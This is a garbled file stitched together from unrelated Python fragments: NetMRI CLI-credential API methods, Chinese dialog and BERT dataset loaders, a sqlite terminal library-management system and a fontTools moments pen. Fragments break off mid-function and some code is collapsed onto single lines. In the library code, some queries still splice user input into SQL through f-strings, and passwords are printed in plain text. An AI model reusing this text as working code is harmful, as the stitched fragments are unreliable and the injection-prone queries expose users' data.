        :param UPWUse: Determines the function of the credential. 'GUESS' indicates that this will only be used if vendor default credential collection is enabled, whereas 'LOCAL' means that this credential will be used in all guessing.
        :type UPWUse: String

        | ``required:`` False | ``default:`` 0
        :param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
        :type UnitID: Integer

        | ``required:`` False | ``default:`` None
        :param UsernameSecure: The username portion of the credential.
        :type UsernameSecure: String

        | ``required:`` False | ``default:`` ANY
        :param Vendor: The vendor devices against which to try this credential.
        :type Vendor: String

        **Outputs**

        :return id: The id of the newly created cli credential.
        :rtype id: Integer
        :return model: The class name of the newly created cli credential.
        :rtype model: String
        :return uri: A URI that may be used to retrieve the newly created cli credential.
        :rtype uri: String
        :return cli_credential: The newly created cli credential.
        :rtype cli_credential: CLICredential
        """
        # All broker methods are thin pass-throughs to the remote API.
        return self.api_request(self._get_method_fullname("create"), kwargs)

    def update(self, **kwargs):
        """Updates an existing cli credential.

        **Inputs**

        | ``required:`` True | ``default:`` None
        :param id: The internal NetMRI identifier for this credential.
        :type id: Integer

        | ``required:`` False | ``default:`` None
        :param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential. If omitted, this field will not be updated.
        :type Origination: String

        | ``required:`` False | ``default:`` None
        :param PasswordSecure: The password portion of the credential. If omitted, this field will not be updated.
        :type PasswordSecure: String

        | ``required:`` False | ``default:`` None
        :param Priority: The priority order in which to attempt this credential. If omitted, this field will not be updated.
        :type Priority: String

        | ``required:`` False | ``default:`` None
        :param Protocol: The protocol for which to use this credential. If omitted, this field will not be updated.
        :type Protocol: String

        | ``required:`` False | ``default:`` None
        :param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured. If omitted, this field will not be updated.
        :type UnitID: Integer

        | ``required:`` False | ``default:`` None
        :param UsernameSecure: The username portion of the credential. If omitted, this field will not be updated.
        :type UsernameSecure: String

        | ``required:`` False | ``default:`` None
        :param Vendor: The vendor devices against which to try this credential. If omitted, this field will not be updated.
        :type Vendor: String

        **Outputs**

        :return id: The id of the updated cli credential.
        :rtype id: Integer
        :return model: The class name of the updated cli credential.
        :rtype model: String
        :return uri: A URI that may be used to retrieve the updated cli credential.
        :rtype uri: String
        :return cli_credential: The updated cli credential.
        :rtype cli_credential: CLICredential
        """
        return self.api_request(self._get_method_fullname("update"), kwargs)

    def destroy(self, **kwargs):
        """Deletes the specified cli credential from NetMRI.

        **Inputs**

        | ``required:`` True | ``default:`` None
        :param id: The internal NetMRI identifier for this credential.
        :type id: Integer

        **Outputs**

        """
        return self.api_request(self._get_method_fullname("destroy"), kwargs)

    def test_ssh_telnet(self, **kwargs):
        """Executes cli credential test and returns results or status id based on async_ind.

        **Inputs**

        | ``required:`` False | ``default:`` None
        :param DeviceID: Device ID to specify what device to test cli credentials on (takes precedence over IP address)
        :type DeviceID: Integer

        | ``required:`` False | ``default:`` None
        :param UnitID: ID of the collector to send the request to, OC only
        :type UnitID: Integer

        | ``required:`` False | ``default:`` None
        :param ip_address: IP Address to test id DeviceID is not given
        :type ip_address: String

        | ``required:`` False | ``default:`` None
        :param VirtualNetworkID: The ID for Virtual Network, must be unique, only needed if DeviceID not set
        :type VirtualNetworkID: Integer

        | ``required:`` False | ``default:`` None
        :param ssh_username: SSH username
        :type ssh_username: String

        | ``required:`` False | ``default:`` None
        :param ssh_password: SSH password
        :type ssh_password: String

        | ``required:`` False | ``default:`` None
        :param telnet_username: Telnet username
        :type telnet_username: String

        | ``required:`` False | ``default:`` None
        :param telnet_password: Telnet password
        :type telnet_password: String

        | ``required:`` False | ``default:`` None
        :param enable_password: Enable mode password
        :type enable_password: String

        | ``required:`` False | ``default:`` False
        :param async_ind: When false, the credential test will be run synchronously, and the API call will block until it is complete. When true, credential test id will be returned to use for subsequent calls
        :type async_ind: Boolean

        **Outputs**

        :return text: When async_ind is false, credential test text will be returned upon completion.
        :rtype text: String
        :return id: The internal #{Brand.lookup(:PRODUCT_NAME_ONLY)} identifier for previously initiated credential test.
        :rtype id: String
        """
        return self.api_request(self._get_method_fullname("test_ssh_telnet"), kwargs)
            for sample in data:
                # Each sample: [context ('<eou>'-joined), response, cand1, ...]
                c = sample[0].split('<eou>')
                c = [i.strip() for i in c]
                c.append(sample[1])
                contexts.append(c)
                # retrieval list
                retrieval_list.append(sample[2:2+retrieval_size])

            for context, retrieval in tqdm(list(zip(contexts, retrieval_list))):
                bundle = dict()
                bundle['context_text'] = ''.join(context)
                # Encode context as [CLS] w... [SEP] per utterance.
                ids = [self.vocab.cls_token_id]
                for utterance in context:
                    ids.extend([self.vocab.convert_tokens_to_ids(word) for word in utterance])
                    ids.append(self.vocab.sep_token_id)
                # length size of the context (keep the most recent tokens)
                ids = ids[-self.src_len_size:]
                bundle['context_id'] = torch.LongTensor(ids)
                # retrieval list
                bundle['retrieval_list_text'] = retrieval
                retrieval_list_ = []
                for i in retrieval:
                    ids = [self.vocab.cls_token_id]
                    ids.extend([self.vocab.convert_tokens_to_ids(word) for word in i])
                    ids.append(self.vocab.sep_token_id)
                    # Candidates are truncated from the front, not the back.
                    ids = ids[:self.src_len_size]
                    retrieval_list_.append(torch.LongTensor(ids))
                bundle['retrieval_list'] = retrieval_list_
                self.data.append(bundle)
        else:
            contexts, responses, retrieval_list = [], [], []
            for sample in data:
                c = sample[0].split('<eou>')
                c = [i.strip() for i in c]
                contexts.append(c)
                responses.append(sample[1])
                # retrieval list
                retrieval_list.append(sample[2:2+retrieval_size])

            for c, r, r_ in tqdm(list(zip(contexts, responses, retrieval_list))):
                bundle = dict()
                bundle['context_text'] = ''.join(c)
                bundle['reply_text'] = r
                # NOTE(review): key is misspelled ('retrievl'); kept as-is
                # since consumers may read this exact key.
                bundle['retrievl_list_text'] = r_
                # ids
                ids = [self.vocab.cls_token_id]
                for utterance in c:
                    ids.extend([self.vocab.convert_tokens_to_ids(word) for word in utterance])
                    ids.append(self.vocab.sep_token_id)
                ids = ids[-self.src_len_size:]
                bundle['context_id'] = torch.LongTensor(ids)
                ids = [self.vocab.cls_token_id]
                ids.extend([self.vocab.convert_tokens_to_ids(word) for word in r])
                ids.append(self.vocab.sep_token_id)
                ids = ids[:self.tgt_len_size]
                bundle['reply_id'] = torch.LongTensor(ids)
                # retrieval ids
                retrieval_list_ = []
                for i in r_:
                    ids = [self.vocab.cls_token_id]
                    ids.extend([self.vocab.convert_tokens_to_ids(word) for word in i])
                    ids.append(self.vocab.sep_token_id)
                    ids = ids[:self.src_len_size]
                    retrieval_list_.append(torch.LongTensor(ids))
                bundle['retrieval_list'] = retrieval_list_
                self.data.append(bundle)
        # NOTE(review): 'dara' typo is in a runtime log string; left unchanged.
        print(f'[!] read and process raw dara from {path} over')

    def __len__(self):
        return len(self.data)

    def __getitem__(self, i):
        return self.data[i]


class DialogDataset(Dataset):

    '''
    Construct the dataset, use once for one epoch
    Tokenizer is the function, default jieba.cut;
    You can also set is the list for no tokenization
    '''

    def __init__(self, path, mode='train', vocab=None, tokenizer=jieba.cut,
                 n_vocab=50000, src_len_size=100, tgt_len_size=20):
        self.mode = mode
        self.tokenizer = tokenizer
        self.src_len_size = src_len_size
        self.tgt_len_size = tgt_len_size
        # load data
        data = read_csv_data(path)
        responses, contexts = [], []
        for sample in tqdm(data):
            responses.append(list(self.tokenizer(sample[1])))
            # Tokenize each utterance and rejoin them with '<eou>' markers.
            rc, c = [], sample[0].split('<eou>')
            for utterance in c:
                rc.extend(list(self.tokenizer(utterance.strip())))
                rc.append('<eou>')
            rc = rc[:-1]
            contexts.append(rc)
        print(f'[!] read raw data from {path} over')
        # process the dataset
        if mode == 'train':
            # Build the vocabulary from the training split only.
            self.vocab = vocabulary(
                    (contexts, responses),
                    n_vocab=n_vocab)
        else:
            assert vocab, 'vocab not the NoneType for test/dev mode'
            self.vocab = vocab
        self.data = []
        # init the data
        for c, r in zip(contexts, responses):
            bundle = dict()
            bundle['context_text'] = ' '.join(c)
            bundle['reply_text'] = ' '.join(r)
            bundle['context_id'] = torch.LongTensor(self.vocab.toks2idx(c, self.src_len_size))
            bundle['reply_id'] = torch.LongTensor(self.vocab.toks2idx(r, self.tgt_len_size))
            bundle['context_l'] = bundle['context_id'].shape[0]
            bundle['reply_l'] = bundle['reply_id'].shape[0]
            self.data.append(bundle)
        print(f'[!] {mode} dataset init over, size: {len(self.data)}')
        print(f'[!] example:')
        example = random.choice(self.data)
        print(f'CTX: {example["context_text"]}')
        print(f'REF: {example["reply_text"]}')

    def __getitem__(self, i):
        bundle = self.data[i]
        cid, cid_l, rid, rid_l = bundle['context_id'], \
                bundle['context_l'], bundle['reply_id'], bundle['reply_l']
        return cid, cid_l, rid, rid_l

    def __len__(self):
        return len(self.data)


class BERTNLIDataset(Dataset):

    '''
    BERT NLI Datset for Chinese
    '''

    def __init__(self, path, max_len=300,
                 vocab_file='data/vocab/vocab_small'):
        data = read_json_data(path)
        self.vocab = BertTokenizer(vocab_file=vocab_file)
        self.max_len = max_len
        # Preprocessed cache lives next to the raw file, with a .pkl suffix.
        self.pp_path = f'{os.path.splitext(path)[0]}.pkl'
        if os.path.exists(self.pp_path):
            with open(self.pp_path, 'rb') as f:
                self.data = pickle.load(f)
            print(f'[!] load preprocessed file from {self.pp_path}')
            # Dataset object must return None
            return None
        self.data = []
        d_ = []
        label_map = {'contradiction': 0, 'neutral': 1, 'entailment': 2}
        for i in data:
            s1, s2, label = i['sentence1'], i['sentence2'], i['gold_label']
            d_.append((s1, s2, label))
        for item in tqdm(d_):
            bundle = {}
            s1, s2, label = item
            # Sentence pair packed into one sequence, separated by [SEP].
            s = f'{s1} [SEP] {s2}'
            sid = self.vocab.encode(s)
            bundle['sid'] = torch.LongTensor(sid)
            bundle['label'] = label_map[label]
            self.data.append(bundle)

    def __len__(self):
        return len(self.data)

    def __getitem__(self, i):
        bundle = self.data[i]
        return bundle

    def save_pickle(self):
        with open(self.pp_path, 'wb') as f:
            pickle.dump(self.data, f)
        print(f'[!] save dataset into {self.pp_path}')


class BERTLOGICDataset(Dataset):

    '''
    BERT LOGIC Dataset: similar with the BERTIRDataset
    The negative samples are chosen by the IR systems, which have the
    high semantic coherence but low logic coherence.
    The whole `train_retrieval` corpus is huge, only use 500000 samples
    '''

    def __init__(self, path, mode='train', max_len=300, samples=1,
                 vocab_file='data/vocab/vocab_small'):
        self.mode = mode
        self.max_len = max_len
        # data = read_csv_data(path)
        data = read_text_data(path)
        data = random.sample(data, 500000)
        # context and response are all the negative samples
        contexts = [i[0] for i in data]
        self.vocab = BertTokenizer(vocab_file=vocab_file)
        self.pp_path = f'{os.path.splitext(path)[0]}_logic.pkl'
        if os.path.exists(self.pp_path):
            with open(self.pp_path, 'rb') as f:
                self.data = pickle.load(f)
            print(f'[!] load preprocessed file from {self.pp_path}')
            return None
        self.data = []
        self.max_len = max_len
        self.es = Elasticsearch()

        # collect the data samples
        d_ = []
        with tqdm(total=len(data)) as pbar:
            # Query Elasticsearch for hard negatives in batches of 1000.
            idx, batch_size = 0, 1000
            while idx < len(data):
                contexts = [i[0] for i in data[idx:idx+batch_size]]
                responses = [i[1] for i in data[idx:idx+batch_size]]
                negatives = generate_logic_negative_samples(
                        contexts, self.es, "retrieval_chatbot",
                        samples=samples)
                for each in zip(contexts, responses, negatives):
                    # (context, [gold response] + negative candidates)
                    d_.append((each[0], [each[1]] + each[2]))
                idx += batch_size
                pbar.update(batch_size)

        if mode in ['train', 'dev']:
            # concatenate the context and the response
            for item in tqdm(d_):
                context, response = item
                context_id = self.vocab.encode(context)
                for idx, r in enumerate(response):
                    bundle = dict()
                    rid = self.vocab.encode(r)
                    # Drop the candidate's [CLS] when concatenating.
                    bundle['context_id'] = context_id + rid[1:]
                    # Index 0 is the gold response.
                    bundle['label'] = 1 if idx == 0 else 0
                    self.data.append(bundle)
        else:
            for item in tqdm(d_):
                context, response = item
                context_id = self.vocab.encode(context)
                res_ids = [self.vocab.encode(i) for i in response]
                bundle = dict()
                bundle['context_id'] = context_id
                bundle['reply_id'] = res_ids
                bundle['label'] = [1] + [0] * samples
                self.data.append(bundle)

    def __len__(self):
        return len(self.data)

    def __getitem__(self, i):
        bundle = self.data[i]
        if self.mode in ['train', 'dev']:
            ids = torch.LongTensor(bundle['context_id'][-self.max_len:])
else: ids = [] for i in range(len(bundle['reply_id'])): p = bundle['context_id'] + bundle['reply_id'][i][1:] ids.append(torch.LongTensor(p[-self.max_len:])) return ids, bundle['label'] def save_pickle(self): with open(self.pp_path, 'wb') as f: pickle.dump(self.data, f) print(f'[!] save dataset into {self.pp_path}') class BERTIRMultiDataset(Dataset): ''' training samples (positive:negative): 1:1 test samples (positive:negative) 1:9 turn_size controls the turn_size of the multi-turn conversations ''' def __init__(self, path, mode='train', max_len=300, samples=9, turn_size=3, vocab_file='data/vocab/vocab_small'): self.mode = mode data = read_text_data(path) responses = [i[-1] for i in data] self.vocab = BertTokenizer.from_pretrained('bert-base-chinese') self.pp_path = f'{os.path.splitext(path)[0]}_multiir.pkl' if os.path.exists(self.pp_path): with open(self.pp_path, 'rb') as f: self.data = pickle.load(f) print(f'[!] load preprocessed file from {self.pp_path}') return None self.data = [] sep_id = self.vocab.convert_tokens_to_ids('[SEP]') self.max_len = max_len # collect the samples d_ = [] for context, response in data: negative = generate_negative_samples(response, responses, samples=1) d_.append((context, [response] + negative)) if mode in ['train', 'dev']: for contexts, responses in tqdm(d_): # recode the [SEP] index after tokenize if contexts.count('[SEP]') < turn_size: continue contexts_id = self.vocab.encode(contexts) for idx, r in enumerate(responses): bundle = dict() rid = self.vocab.encode(r)[1:] # without [CLS] ids = contexts_id + rid if len(ids) > 512: continue bundle['ids'] = ids bundle['label'] = 1 if idx == 0 else 0 bundle['turn_length'] = bundle['ids'].count(sep_id) sep_index = (np.array(ids) == sep_id).astype(np.int).nonzero()[0] sep_chunk_size, last_sep = [], 0 for sep_idx in sep_index: sep_chunk_size.append(sep_idx - last_sep + 1) last_sep = sep_idx + 1 bundle['sep_index'] = sep_chunk_size self.data.append(bundle) else: for item in tqdm(d_): contexts, 
responses = item contexts_id = [self.vocab.encode(context)[-self.max_len:] for context in contexts] res_ids = [self.vocab.encode(i)[-self.max_len] for i in responses] bundle = dict() bundle['ids'] = contexts_id bundle['replys_id'] = res_ids bundle['label'] = [1] + [0] * samples bundle['turn_length'] = len(bundle['ids']) + 1 self.data.append(bundle) self.data = sorted(self.data, key=lambda i:i['turn_length']) print(f'[!] read the processed raw data from {path} over') def __len__(self): return len(self.data) def save_pickle(self): with open(self.pp_path, 'wb') as f: pickle.dump(self.data, f) print(f'[!] save the dataset into {self.pp_path}') def __getitem__(self, i): return self.data[i] class BERTIRMultiDataLoader: def __init__(self, data, shuffle=True, batch_size=16): self.data = data self.data_size = len(data) self.shuffle = shuffle self.batch_size = batch_size self.lengths = [i['turn_length'] for i in self.data.data] self.index, self.pad = 0, 0 def __iter__(self): return self def __len__(self): return self.data_size def __next__(self): if self.index >= self.data_size: self.index = 0 raise StopIteration else: idx, start1 = self.index, self.lengths[self.index] for l in self.lengths[self.index:self.index+self.batch_size]: if l != start1: break idx += 1 batch = self.data[self.index:idx] # batch*[turn, seq] if self.shuffle: random.shuffle(batch) self.index = idx if self.data.mode in ['train', 'dev']: # construct the tensor # batch: batch*[turn, seq] -> turn*[batch, seq] with the [PAD] ids = [torch.LongTensor(i['ids']) for i in batch] ids = pad_sequence(ids, batch_first=True, padding_value=self.pad) # [batch, seq] sep_index = [i['sep_index'] for i in batch] labels = torch.LongTensor([i['label'] for i in batch]) # rest: turn_size*[batch, seq]; labels: [batch] if torch.cuda.is_available(): ids = ids.cuda() labels = labels.cuda() return ids, labels, sep_index else: rest, turn_size = [], len(batch[0]) contexts, responses, labels = [item['ids'] for item in batch], 
[item['replys_ids']
# Import necessary modules import sqlite3 import pandas as pd from pandas import DataFrame from datetime import datetime as dt ########### ## MENUS ## ########### main_menu = ''' ########################################################## What would you like to do today? 1 --- Login as Librarian 2 --- Login as User 3 --- Register as a User/Librarian Please type any key and press enter to quit ########################################################## >>> ''' librarian_menu = ''' ######################################################### What would you like to do today? 1 --- Check Account Details 2 --- Update your User Info 3 --- Delete your Account 4 --- Add Books to the Database 5 --- Update Book Details in the Database 6 --- Delete a Book from the Database 7 --- See All Books and their Status 8 --- Who Owes Me Money? 9 --- Rented Books? Please type any key and press enter to log out ######################################################### >>> ''' user_menu = ''' ########################################################## What would you like to do today? 
# Query the books table and return a list of all the books
def generate_book_list():
    """Print and return a DataFrame of every row in the `books` table.

    Returns an empty DataFrame (and prints a notice) when there are no books.
    """
    con = sqlite3.connect('terminal_mgt_system.db')
    try:
        book_list = pd.read_sql('SELECT * FROM books', con)
    finally:
        # BUG FIX: the original never closed the connection.
        con.close()
    if book_list.empty:
        print("There are no books at the library")
        return DataFrame()
    print("Here's a table of all the books we have and their current status:")
    print(book_list)
    print("\n")
    return book_list
# Query the users table and return a list of people who owe fees to the librarian
def people_who_owe_money():
    """Print every user whose outstanding `fees` balance is positive."""
    query = '''
    SELECT user_id, username, name, contact_information,fees
    FROM users
    WHERE fees > 0
    '''
    con = sqlite3.connect('terminal_mgt_system.db')
    try:
        data = pd.read_sql(query, con)
    finally:
        con.close()
    if data.empty:
        print("No one owes the library money.")
    else:
        print("Here's a list of people who owe the library money:")
        print(data)
        print("\n")

# Query books table and return a list of people who are overdue
def rented_books():
    """Print every book that is currently rented out."""
    query = '''
    SELECT name,rented,rented_at,rented_by
    FROM books
    WHERE books.rented = 1
    '''
    con = sqlite3.connect("terminal_mgt_system.db")
    try:
        data = pd.read_sql(query, con)
    finally:
        con.close()
    # BUG FIX: removed a leftover debug statement: print("natha")
    if data.empty:
        print("No one is overdue...YET!")
    else:
        print("Here's a list of people who are overdue: ")
        print(data)
        print("\n")

def get_fine(ask):
    """Return (days_rented, fees) for the book with id `ask`.

    The first 3 days are free; every further day costs 5.

    BUG FIX: the original extracted month/day digits by string index and only
    handled same-month or adjacent-month rentals (wrong across year boundaries
    and non-adjacent months). Real date arithmetic handles all cases.
    """
    con = sqlite3.connect('terminal_mgt_system.db')
    try:
        cur = con.cursor()
        # Parameterized query: `ask` comes from user input (SQL injection fix).
        cur.execute('SELECT rented_at FROM books WHERE book_id = ?', (ask,))
        rent_date = cur.fetchall()
    finally:
        con.close()
    # `rented_at` starts with an ISO date: YYYY-MM-DD...
    rented_on = dt.strptime(str(rent_date[0][0])[:10], '%Y-%m-%d').date()
    days_rented = (dt.today().date() - rented_on).days
    fees = (days_rented - 3) * 5 if days_rented > 3 else 0
    return days_rented, fees
username self.password = password self.name = name self.contact_information = contact_information self.loggedIn = False # Check account details def check_details(self): print("Here are your account details") print(f''' Username: {self.username} Password: {<PASSWORD>} Name: {self.name} Contact Information: {self.contact_information} ''') # Delete my account def delete_self(self): table = "users" if self.__class__.__name__ == "user_class" else "librarian" response = input("Are you sure you want to delete your account? Please answer Yes or No\n>>> ") if response.strip().lower() == "yes": con = sqlite3.connect('terminal_mgt_system.db') query = f''' DELETE FROM {table} WHERE username = "{self.username}"; ''' con.execute(query) con.commit() con.close() # Update personal information def update_info(self): table = "users" if self.__class__.__name__ == "user_class" else "librarian" response = input(''' What field would you like to up date? You cannot update your username. 1 --- Name 2 --- Contact Information 3 --- Password >>> ''') if response.strip() not in ["1","2","3"]: print("Enter a valid option") else: if response == "1": name = input("Enter your new name now.\n>>> ") print(f"Here's your new name: {name}") print("Updating now...") self.name = name query = f''' UPDATE {table} SET name = "{name}" WHERE username = "{self.username}"; ''' elif response == "2": contact_information = input("Enter your new email address now.\n>>> ") print(f"Here's your new contact_info: {contact_information}") print("Updating now...") self.contact_information = contact_information query = f''' UPDATE {table} SET contact_information = "{contact_information}" WHERE username = "{self.username}"; ''' elif response == "3": password = input("Enter your new password now.\n>>> ") print(f"Here's your new password: {password}") print("Updating now...") self.password = password query = f''' UPDATE {table} SET password = "{password}" WHERE username = "{self.username}"; ''' con = 
# The librarian class
class librarian_class(main_class):
    """Librarian account: can add, edit and delete books in the catalogue."""

    def __init__(self, username, password, name, contact_information):
        main_class.__init__(self, username, password, name, contact_information)

    # Librarian can add books to the database using this method
    def add_books(self):
        """Prompt for a new book's details and insert it into `books`."""
        print("Welcome to add a book feature! Please enter the information as requested...")
        book_name = input("What's the name of the book?\n>>>")
        while book_name == "":
            book_name = input("What's the name of the book?\n>>>")
        book_author = input("What's the author's name?\n>>>")
        while book_author == "":
            # BUG FIX: the re-prompt asked for the book name, not the author.
            book_author = input("What's the author's name?\n>>>")
        book_description = input("Please give a small description of the book.\n>>> ")
        while book_description == "":
            # BUG FIX: the re-prompt asked for the book name, not the description.
            book_description = input("Please give a small description of the book.\n>>> ")
        print(f'''
        Here's the information we're updating to the system.
        You can always edit or delete the book from the options menu:
        Book Name: {book_name}
        Author: {book_author}
        Description: {book_description}
        ''')
        input("Press enter to proceed.")
        query = '''
        INSERT INTO books (author,name,description)
        VALUES (?,?,?)
        '''
        print("Updating the database now...")
        con = sqlite3.connect('terminal_mgt_system.db')
        # BUG FIX: the original passed (book_name, book_author, ...) against
        # columns (author, name, ...), storing the title as the author and
        # vice versa.
        con.execute(query, (book_author, book_name, book_description))
        con.commit()
        con.close()
        print("Added the book to the database!")

    # Librarian can update book details using this method
    def update_book_details(self):
        """Pick a book by id and update its name, author, or description."""
        book_list = generate_book_list()
        try:
            ask = int(input("What Book ID would you like to update?\n>>> "))
            if ask not in book_list['book_id'].values:
                print("Book ID not in database.")
                self.update_book_details()
            else:
                response = input('''
                What information about the book would you like to update? Please enter 1, 2, or 3
                1 --- Book Name
                2 --- Book Author
                3 --- Book Description
                >>> ''')
                if response.strip() not in ["1", "2", "3"]:
                    print("Enter a valid option")
                    # BUG FIX: the original recursed into update_info() here
                    # (the account-editing method) instead of retrying this one.
                    self.update_book_details()
                else:
                    if response == "1":
                        name = input("Enter the new name now.\n>>> ")
                        print(f"Here's your new book name: {name}")
                        print("Updating now...")
                        column, value = "name", name
                    elif response == "2":
                        author = input("Enter the new author.\n>>> ")
                        print(f"Here's the new author: {author}")
                        print("Updating now...")
                        column, value = "author", author
                    else:
                        description = input("Enter the new description.\n>>> ")
                        # BUG FIX: the original printed an undefined variable
                        # `password` here, raising NameError.
                        print(f"Here's the new description: {description}")
                        print("Updating now...")
                        column, value = "description", description
                    con = sqlite3.connect('terminal_mgt_system.db')
                    # Parameterized value: user text went straight into the
                    # SQL string in the original (injection / quoting bugs).
                    con.execute(f'UPDATE books SET {column} = ? WHERE book_id = ?',
                                (value, ask))
                    con.commit()
                    con.close()
                    print("Updated the book successfully")
                    generate_book_list()
        except Exception:
            print("Please enter a valid ID")

    # The librarian can delete books from the database using this method
    def delete_books(self):
        """Pick a book by id, confirm, and delete it from `books`."""
        book_list = generate_book_list()
        try:
            # BUG FIX: the int() conversion sat outside the try in the
            # original, so a non-numeric id crashed instead of re-prompting.
            ask = int(input("What book ID would you like to delete?\n>>> "))
            if ask not in book_list['book_id'].values:
                print("Book ID not in database.")
            else:
                print("Here's the book you're trying to delete:")
                print(book_list[book_list['book_id'] == ask])
                response = input("Proceed? Yes or No?\n>>> ")
                if response.strip().lower() == "yes":
                    print("Deleting the book now...")
                    con = sqlite3.connect('terminal_mgt_system.db')
                    con.execute('DELETE FROM books WHERE book_id = ?', (ask,))
                    con.commit()
                    con.close()
                    print("The book has been deleted.")
                else:
                    print("Not deleting book.")
        except Exception:
            print("Please enter a valid book ID")
class MomentsPen(BasePen):
    """Accumulate the 0th (area), 1st, and 2nd moments of area of the glyph
    outline drawn into this pen.

    NOTE(review): autogenerated code — the polynomial update rules below are
    machine-derived (Green's theorem applied per segment); do not hand-edit
    the formulas. `_curveToOne` (cubic case) is defined further down the file.
    """

    def __init__(self, glyphset=None):
        BasePen.__init__(self, glyphset)
        # Running totals, updated by each segment callback.
        self.area = 0
        self.momentX = 0
        self.momentY = 0
        self.momentXX = 0
        self.momentXY = 0
        self.momentYY = 0

    def _moveTo(self, p0):
        # Remember the contour start so _closePath/_endPath can check closure.
        self.__startPoint = p0

    def _closePath(self):
        p0 = self._getCurrentPoint()
        if p0 != self.__startPoint:
            # Implicit closing line back to the contour start.
            self._lineTo(self.__startPoint)

    def _endPath(self):
        p0 = self._getCurrentPoint()
        if p0 != self.__startPoint:
            # Green theorem is not defined on open contours.
            raise NotImplementedError

    def _lineTo(self, p1):
        # Line segment from the current point to p1: closed-form moment
        # contributions (common subexpressions r0..r12 are autogenerated).
        x0,y0 = self._getCurrentPoint()
        x1,y1 = p1

        r0 = x1*y0
        r1 = x1*y1
        r2 = x1**2
        r3 = x0**2
        r4 = 2*y0
        r5 = y0 - y1
        r6 = r5*x0
        r7 = y0**2
        r8 = y1**2
        r9 = x1**3
        r10 = r4*y1
        r11 = y0**3
        r12 = y1**3

        self.area += -r0/2 - r1/2 + x0*(y0 + y1)/2
        self.momentX += -r2*y0/6 - r2*y1/3 + r3*(r4 + y1)/6 - r6*x1/6
        self.momentY += -r0*y1/6 - r7*x1/6 - r8*x1/6 + x0*(r7 + r8 + y0*y1)/6
        self.momentXX += -r2*r6/12 - r3*r5*x1/12 - r9*y0/12 - r9*y1/4 + x0**3*(3*y0 + y1)/12
        self.momentXY += -r10*r2/24 - r2*r7/24 - r2*r8/8 + r3*(r10 + 3*r7 + r8)/24 - x0*x1*(r7 - r8)/12
        self.momentYY += -r0*r8/12 - r1*r7/12 - r11*x1/12 - r12*x1/12 + x0*(r11 + r12 + r7*y1 + r8*y0)/12

    def _qCurveToOne(self, p1, p2):
        # Quadratic Bezier segment (control p1, end p2): closed-form moment
        # contributions (common subexpressions r0..r55 are autogenerated).
        x0,y0 = self._getCurrentPoint()
        x1,y1 = p1
        x2,y2 = p2

        r0 = 2*x1
        r1 = r0*y2
        r2 = 2*y1
        r3 = r2*x2
        r4 = 3*y2
        r5 = r4*x2
        r6 = 3*y0
        r7 = x1**2
        r8 = 2*y2
        r9 = x2**2
        r10 = 4*y1
        r11 = 10*y2
        r12 = r0*x2
        r13 = x0**2
        r14 = 10*y0
        r15 = x2*y2
        r16 = r0*y1 + r15
        r17 = 4*x1
        r18 = x2*y0
        r19 = r10*r15
        r20 = y1**2
        r21 = 2*r20
        r22 = y2**2
        r23 = r22*x2
        r24 = 5*r23
        r25 = y0**2
        r26 = y0*y2
        r27 = 5*r25
        r28 = 8*x1**3
        r29 = x2**3
        r30 = 30*y1
        r31 = 6*y1
        r32 = 10*r9*x1
        r33 = 4*r7
        r34 = 5*y2
        r35 = 12*r7
        r36 = r5 + 20*x1*y1
        r37 = 30*x1
        r38 = 12*x1
        r39 = 20*r7
        r40 = 8*r7*y1
        r41 = r34*r9
        r42 = 60*y1
        r43 = 20*r20
        r44 = 4*r20
        r45 = 15*r22
        r46 = r38*x2
        r47 = y1*y2
        r48 = 8*r20*x1 + r24
        r49 = 6*x1
        r50 = 8*y1**3
        r51 = y2**3
        r52 = y0**3
        r53 = 10*y1
        r54 = 12*y1
        r55 = 12*r20

        self.area += r1/6 - r3/6 - r5/6 + x0*(r2 + r6 + y2)/6 - y0*(r0 + x2)/6
        self.momentX += -r10*r9/30 - r11*r9/30 - r12*(-r8 + y1)/30 + r13*(r10 + r14 + y2)/30 + r7*r8/30 + x0*(r1 + r16 - r17*y0 - r18)/30 - y0*(r12 + 2*r7 + r9)/30
        self.momentY += r1*(r8 + y1)/30 - r19/30 - r21*x2/30 - r24/30 - r25*(r17 + x2)/30 + x0*(r10*y0 + r2*y2 + r21 + r22 + r26 + r27)/30 - y0*(r16 + r3)/30
        self.momentXX += r13*(r11*x1 - 5*r18 + r3 + r36 - r37*y0)/420 + r28*y2/420 - r29*r30/420 - r29*y2/4 - r32*(r2 - r4)/420 - r33*x2*(r2 - r34)/420 + x0**3*(r31 + 21*y0 + y2)/84 - x0*(-r15*r38 + r18*r38 + r2*r9 - r35*y2 + r39*y0 - r40 - r41 + r6*r9)/420 - y0*(r28 + 5*r29 + r32 + r35*x2)/420
        self.momentXY += r13*(r14*y2 + 3*r22 + 105*r25 + r42*y0 + r43 + 12*r47)/840 - r17*x2*(r44 - r45)/840 - r22*r9/8 - r25*(r39 + r46 + 3*r9)/840 + r33*y2*(r10 + r34)/840 - r42*r9*y2/840 - r43*r9/840 + x0*(-r10*r18 + r17*r26 + r19 + r22*r49 - r25*r37 - r27*x2 + r38*r47 + r48)/420 - y0*(r15*r17 + r31*r9 + r40 + r41 + r46*y1)/420
        self.momentYY += r1*(r11*y1 + r44 + r45)/420 - r15*r43/420 - r23*r30/420 - r25*(r1 + r36 + r53*x2)/420 - r50*x2/420 - r51*x2/12 - r52*(r49 + x2)/84 + x0*(r22*r53 + r22*r6 + r25*r30 + r25*r34 + r26*r54 + r43*y0 + r50 + 5*r51 + 35*r52 + r55*y2)/420 - y0*(-r0*r22 + r15*r54 + r48 + r55*x2)/420
